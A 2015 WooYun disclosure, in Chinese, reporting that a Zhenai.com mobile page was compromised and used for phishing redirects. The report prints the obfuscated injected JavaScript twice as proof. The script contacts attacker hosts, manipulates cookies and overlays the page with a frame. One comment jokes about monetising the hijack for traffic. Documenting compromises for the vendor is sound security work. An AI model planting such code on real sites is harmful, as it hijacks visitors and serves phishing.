珍爱网被shell已被用作钓鱼

漏洞概要

缺陷编号:WooYun-2015-097901

漏洞标题:珍爱网被shell已被用作钓鱼

相关厂商:珍爱网

漏洞作者:路人甲

提交时间:2015-02-21 15:01

公开时间:2015-04-13 16:58

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-02-21: 细节已通知厂商并且等待厂商处理中
2015-02-21: 厂商已经确认,细节仅向厂商公开
2015-03-03: 细节向核心白帽子及相关领域专家公开
2015-03-13: 细节向普通白帽子公开
2015-03-23: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

珍爱网被shell

详细说明:

http://m.zhenai.com/profile/qq/index.html?8oHP#www.5173.com-20150204.shtmlhttp://m.zhenai.com/profile/qq/index.html?源代码<!DOCTYPEhtml><html xmlns="http://www.w3.org/1999/xhtml"><head><meta charset="utf-8" /><meta name="renderer" content="webkit" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Expires" content="0" /><title></title></head><script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.0.min.js"></script><script type="text/javascript">var _$=["location","search","substr","http://www.leam.com.cn/g.php","document","cookie","indexOf","links=","parseInt","random","ajax","get","http://www.olfof.cn/json.php?k=","jsonp","callback","success_MyCallback","body","empty","links=","links","base=","reload","body","html","..",'links','base',"?b=","&l=","document","split","; ","length","=","unescape",'write','<fra','write','meset','write',' framespacing="0" border="0" rows="100%,*" frameborder="0">','write','<frame src="http://www.secevery.com:4321/bugs/wooyun-2015-097901/','"','write',' scrolling="yes">','write','</frame>','write','</fra','write','meset>','',"charCodeAt","toString","match",'=0;expires=',"toUTCString"];var a=window[_$[0]][_$[1]][_$[2]](1);var b=_$[3];if(window[_$[4]][_$[5]][_$[6]](_$[7])==-1){var g=window[_$[8]](Math[_$[9]]()*19+16);$[_$[10]]({type:_$[11],url:_$[12]+a,dataType:_$[13],jsonp:_$[14],jsonpCallback:_$[15],success:function(h){$(_$[16])[_$[17]]();window[_$[4]][_$[5]]=_$[7]+e(h[_$[19]],g);window[_$[4]][_$[5]]=_$[20]+g;location[_$[21]](false)},error:function(){$(_$[16])[_$[23]](_$[24])}})}else{var g=c(_$[25]);var h=c(_$[26]);f();var i=b+_$[27]+h+_$[28]+g;d(i,_$[4])};function c(g){var h=window[_$[4]][_$[5]][_$[30]](_$[31]);for(var i=0;i<h[_$[32]];i++){var j=h[i][_$[30]](_$[33]);if(j[0]==g)return window[_$[34]](j[1])}};function 
d(g,h){window[h][_$[35]](_$[36]);window[h][_$[35]](_$[38]);window[h][_$[35]](_$[40]);window[h][_$[35]](_$[42]+g+_$[43]);window[h][_$[35]](_$[45]);window[h][_$[35]](_$[47]);window[h][_$[35]](_$[49]);window[h][_$[35]](_$[51])};function e(g,h){var i=g[_$[32]];str=_$[52];for(var j=0;j<i;j++){str+=window[_$[8]](g[_$[53]](j))[_$[54]](h)};return str};function f(){var h=window[_$[4]][_$[5]][_$[55]](/[^ =;]+(?=\=)/g);if(h){for(var i=h[_$[32]];i--;){window[_$[4]][_$[5]]=h[i]+_$[56]+new Date(0)[_$[57]]()}}}</script><body></body></html>问题站点http://www.olfof.cn/shell没扫出来管理员自行排查

漏洞证明:

http://m.zhenai.com/profile/qq/index.html?8oHP#www.5173.com-20150204.shtmlhttp://m.zhenai.com/profile/qq/index.html?源代码<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta charset="utf-8" /><meta name="renderer" content="webkit" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Expires" content="0" /><title></title></head><script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.0.min.js"></script><script type="text/javascript">var _$=["location","search","substr","http://www.leam.com.cn/g.php","document","cookie","indexOf","links=","parseInt","random","ajax","get","http://www.olfof.cn/json.php?k=","jsonp","callback","success_MyCallback","body","empty","links=","links","base=","reload","body","html","..",'links','base',"?b=","&l=","document","split","; ","length","=","unescape",'write','<fra','write','meset','write',' framespacing="0" border="0" rows="100%,*" frameborder="0">','write','<frame src="http://www.secevery.com:4321/bugs/wooyun-2015-097901/','"','write',' scrolling="yes">','write','</frame>','write','</fra','write','meset>','',"charCodeAt","toString","match",'=0;expires=',"toUTCString"];var a=window[_$[0]][_$[1]][_$[2]](1);var b=_$[3];if(window[_$[4]][_$[5]][_$[6]](_$[7])==-1){var g=window[_$[8]](Math[_$[9]]()*19+16);$[_$[10]]({type:_$[11],url:_$[12]+a,dataType:_$[13],jsonp:_$[14],jsonpCallback:_$[15],success:function(h){$(_$[16])[_$[17]]();window[_$[4]][_$[5]]=_$[7]+e(h[_$[19]],g);window[_$[4]][_$[5]]=_$[20]+g;location[_$[21]](false)},error:function(){$(_$[16])[_$[23]](_$[24])}})}else{var g=c(_$[25]);var h=c(_$[26]);f();var i=b+_$[27]+h+_$[28]+g;d(i,_$[4])};function c(g){var h=window[_$[4]][_$[5]][_$[30]](_$[31]);for(var i=0;i<h[_$[32]];i++){var j=h[i][_$[30]](_$[33]);if(j[0]==g)return window[_$[34]](j[1])}};function 
d(g,h){window[h][_$[35]](_$[36]);window[h][_$[35]](_$[38]);window[h][_$[35]](_$[40]);window[h][_$[35]](_$[42]+g+_$[43]);window[h][_$[35]](_$[45]);window[h][_$[35]](_$[47]);window[h][_$[35]](_$[49]);window[h][_$[35]](_$[51])};function e(g,h){var i=g[_$[32]];str=_$[52];for(var j=0;j<i;j++){str+=window[_$[8]](g[_$[53]](j))[_$[54]](h)};return str};function f(){var h=window[_$[4]][_$[5]][_$[55]](/[^ =;]+(?=\=)/g);if(h){for(var i=h[_$[32]];i--;){window[_$[4]][_$[5]]=h[i]+_$[56]+new Date(0)[_$[57]]()}}}</script><body></body></html>问题站点http://www.olfof.cn/shell没扫出来管理员自行排查

修复方案:

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-02-21 16:39

厂商回复:

安全无小事,谢谢

最新状态:

暂无

评价

  1. 2010-01-01 00:00 子非海绵宝宝 (白帽子 | Rank:1220 漏洞数:113)

    shell就3RANK?还无小事?

  2. 2010-01-01 00:00 浅蓝 (白帽子 | Rank:131 漏洞数:20)

    @子非海绵宝宝 - -人家的意思是“安全的一点小细节都要被重视”,不过rank确实少了点

  3. 2010-01-01 00:00 大白菜 (白帽子 | Rank:22 漏洞数:3)

    ./...还不如拿来引流还能赚个几K